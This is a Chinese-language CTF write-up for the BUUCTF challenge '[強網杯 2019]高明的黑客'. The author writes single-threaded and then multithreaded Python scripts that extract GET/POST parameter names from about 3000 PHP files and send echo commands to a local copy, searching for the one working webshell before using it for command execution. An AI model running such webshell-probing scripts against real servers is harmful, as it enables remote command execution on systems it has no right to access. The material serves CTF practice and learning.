BUUCTF WEB [強網杯 2019]高明的黑客
打開網頁,發現有提示~~源碼可下
下載源碼,發現3002個文件,查看一下,發現有不少的shell???
不過都是不能用的,其實這道題目就是讓我們找到能用的shell,考察的應該是腳本的編寫能力吧!!
源碼已經down下來了,在本地搭一個環境,php 7.0以上,否則會報語法錯誤!
然後編寫腳本(特別慢):
import requests
import sys
import os
url = "http://127.0.0.1/src/"
files = os.listdir("C://Users//Administrator//Desktop//www//src")
#print(files)
def GetGet(file):
a = []
f = open("C://Users//Administrator//Desktop//www//src//"+file,'r')
content = f.readlines()
for i in content:
if i.find("$_GET['") > 0:
start = i.find("$_GET['") + 7
end = i.find("'",start)
a.append(i[start:end])
return a
def GetPost(file):
a = []
f = open("C://Users//Administrator//Desktop//www//src//"+file,'r')
content = f.readlines()
for i in content:
if i.find("$_POST['") > 0:
start = i.find("$_POST['") + 8
end = i.find("'",start)
a.append(i[start:end])
return a
def Send():
for i in files:
get = GetGet(i)
print("Try filename: %s"%i)
for j in get:
NewUrl = url+"%s?%s=%s"%(i,j,'echo "Success!!!"')
s = requests.get(NewUrl)
if("Success" in s.text):
print("Success! Get:%s" % (j))
break
post = GetPost(i)
for j in post:
NewUrl = url+"%s"%(i)
s = requests.post(NewUrl,data={j:"echo 'Success!!'"})
if("Success" in s.text):
print("Success! Post:%s" % (j))
break
Send()
這個腳本垃圾的一批,估計要跑一天,,,太菜了呀,直接放棄掉這個腳本了,,
可是好像也不會多線程啥的呀???哭了!!!搜了一下python3的多線程,改了一下:
import requests
import sys
import os
import threading
import time
url = "http://127.0.0.1/src/"
files = os.listdir("C://Users//Administrator//Desktop//www//src")
#print(files)
def GetGet(file):
a = []
f = open("C://Users//Administrator//Desktop//www//src//"+file,'r')
content = f.readlines()
for i in content:
if i.find("$_GET['") > 0:
start = i.find("$_GET['") + 7
end = i.find("'",start)
a.append(i[start:end])
return a
def GetPost(file):
a = []
f = open("C://Users//Administrator//Desktop//www//src//"+file,'r')
content = f.readlines()
for i in content:
if i.find("$_POST['") > 0:
start = i.find("$_POST['") + 8
end = i.find("'",start)
a.append(i[start:end])
return a
def Send(start,end):
start = int(start)
end = int(end)
for i in range(start,end):
i = files[i]
get = GetGet(i)
print("Try filename: %s"%i)
for j in get:
NewUrl = url+"%s?%s=%s"%(i,j,'echo "Success!!!"')
s = requests.get(NewUrl)
if("Success" in s.text):
print("Success! Url:%s" % (NewUrl))
break
post = GetPost(i)
for j in post:
NewUrl = url+"%s"%(i)
s = requests.post(NewUrl,data={j:"echo 'Success!!'"})
if("Success" in s.text):
print("Success! Post:%s" % (j))
break
class myThread (threading.Thread):
def __init__(self, threadID, name, counter):
threading.Thread.__init__(self)
self.threadID = threadID
self.name = name
self.counter = counter
def run(self):
Send(self.name, self.counter)
for i in range(0,150):
thread = myThread(i,i*20,(i+1)*20)
thread.start()
跑了大概20多分鐘吧,得到了:
直接去進行命令執行!!
最後得到了flag:
盡力了,只能將時間縮減到20多分鐘,,,
哪位大佬如果知道更快的方法麻煩指導一下,,,,,感激不盡!!!